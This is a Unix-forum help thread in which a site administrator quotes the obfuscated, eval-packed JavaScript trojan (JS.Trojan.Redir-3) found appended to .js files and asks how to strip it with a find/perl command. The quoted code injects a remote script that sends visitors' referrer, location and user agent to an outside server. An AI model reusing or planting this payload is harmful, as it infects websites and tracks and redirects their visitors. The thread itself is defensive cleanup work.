Login or Register to Ask a Question and Join Our Community


Shell Programming and Scripting

how to remove hacking code from multiple files

 
Thread Tools Search this Thread
Top Forums Shell Programming and Scripting how to remove hacking code from multiple files
Prev   Next
# 1  
Old 10-02-2012
how to remove hacking code from multiple files
Hello,

I've located with clamav multiple .js files infected at the end with the above (JS.Trojan.Redir-3) code

Code:
var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29
\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27
\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B
\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63
\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63
\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72
\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D
\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69
\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79
\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C
\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,
_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--)
{_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return 
_0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3])
{_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} 
(_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

I would like to remove all of these with a shell command.

I would use as an example this one :
Code:
find /vhosts -type f -name '*.js' -print0 | xargs -0 perl -i -0777pe 's|(.*)/\*km0ae9gr6m\*/.*|$1\n|s'

but I'm not sure what to change with all the escape characters and the * symbols.

any help would be appriciated.
 
Login or Register to Ask a Question

Previous Thread | Next Thread

10 More Discussions You Might Find Interesting

1. UNIX for Beginners Questions & Answers

How to implement a simple command/code for multiple files?

I have been extracting a row, based on multiple key word from a xls/csv file, by using the following command. I have to implement the same for multiple xls/csv files, therefore please help me to do the same. awk ' { tbp=0 if ($0 ~ keyword1 && k1 == 0) { tbp=1; k1++ } if ($0 ~ keyword2... (2 Replies)
Discussion started by: dineshkumarsrk
2 Replies

2. Shell Programming and Scripting

[Solved] How to remove multiple files?

Hi Gurus, I have below files in one directory. the file name has date and time portion which is exactly the file be created. I need keep only lasted created file which is abc_20140101_1550 and remove rest of the file. abc_20140101_1300 abc_20140101_1200 abc_20140101_1400 abc_20140101_1500... (2 Replies)
Discussion started by: ken6503
2 Replies

3. Shell Programming and Scripting

How to remove hidden backslash in multiple files?

Hi I have around 300 files in a folder. When I type ls -l I see the following Mouse.chr10_+_:101862321-101863928.maf Mouse.chr10_+_:101862322-101863928.maf Mouse.chr10_+_:101862323-101863928.maf But when I run my scripts, they couldn't recognise the filename because of hidden backslash like... (5 Replies)
Discussion started by: quincyjones
5 Replies

4. Shell Programming and Scripting

Code to remove files when corresponding file doesnt exist isnt working.

I am trying to add some code to the begging of a script so that it will remove all the .transcript files, when their is no coressponding .wav file. But it doesnt work. This is the code I have added: for transcriptfile in `$voicemaildir/*.transcript`; do wavfile=`echo $transcriptfile | cut -d'.'... (2 Replies)
Discussion started by: ghurty
2 Replies

5. Shell Programming and Scripting

Remove java code from multiple files

Hello, We have a client who has had an FTP injection attack on their account. Over 600 files have this code added to the files: <script>var t="";var... (10 Replies)
Discussion started by: dhasbro
10 Replies

6. UNIX for Dummies Questions & Answers

How to remove characters from multiple .txt files

Friends, I want to remove charecters from multiple .txt files. Foe example : In this .txt files there are many "ctrl m" present in last of each line in one .txt file. I want to remove "ctrl m" from each line from all .txt files. Need your help regarding this. (4 Replies)
Discussion started by: meetsubhas
4 Replies

7. Shell Programming and Scripting

To remove multiple files in FTP

We have a files in FTP server..... after getting the files from FTP by mget *.* i hav to remove all files (multiple files) at once... is there any command to delete multiple files at once (2 Replies)
Discussion started by: nani1984
2 Replies

8. UNIX for Dummies Questions & Answers

Using AWK: Extract data from multiple files and output to multiple new files

Hi, I'd like to process multiple files. For example: file1.txt file2.txt file3.txt Each file contains several lines of data. I want to extract a piece of data and output it to a new file. file1.txt ----> newfile1.txt file2.txt ----> newfile2.txt file3.txt ----> newfile3.txt Here is... (3 Replies)
Discussion started by: Liverpaul09
3 Replies

9. Shell Programming and Scripting

How to remove certain lines in multiple txt files?

Hi , I have this type of files:- BGH.28OCT2008.00000001.433155.001 BGH.28OCT2008.00000002.1552361.001 BGH.28OCT2008.00000003.1438355.001 BGH.28OCT2008.00000004.1562602.001 Inside them contains the below: 5Discounts 6P150 - Max Total Usage RM150|-221.00 P150 EPP - Talktime RM150... (5 Replies)
Discussion started by: olloong
5 Replies

10. Shell Programming and Scripting

read list of filenames from text file and remove these files in multiple directories

I have a large list of filenames from an Excel sheet, which I then translate into a simple text file. I'd like to use this list, which contains various file extensions , to archive these files and then remove them recursively through multiple directories and subdirectories. So far, it looks like... (5 Replies)
Discussion started by: fxvisions
5 Replies
Login or Register to Ask a Question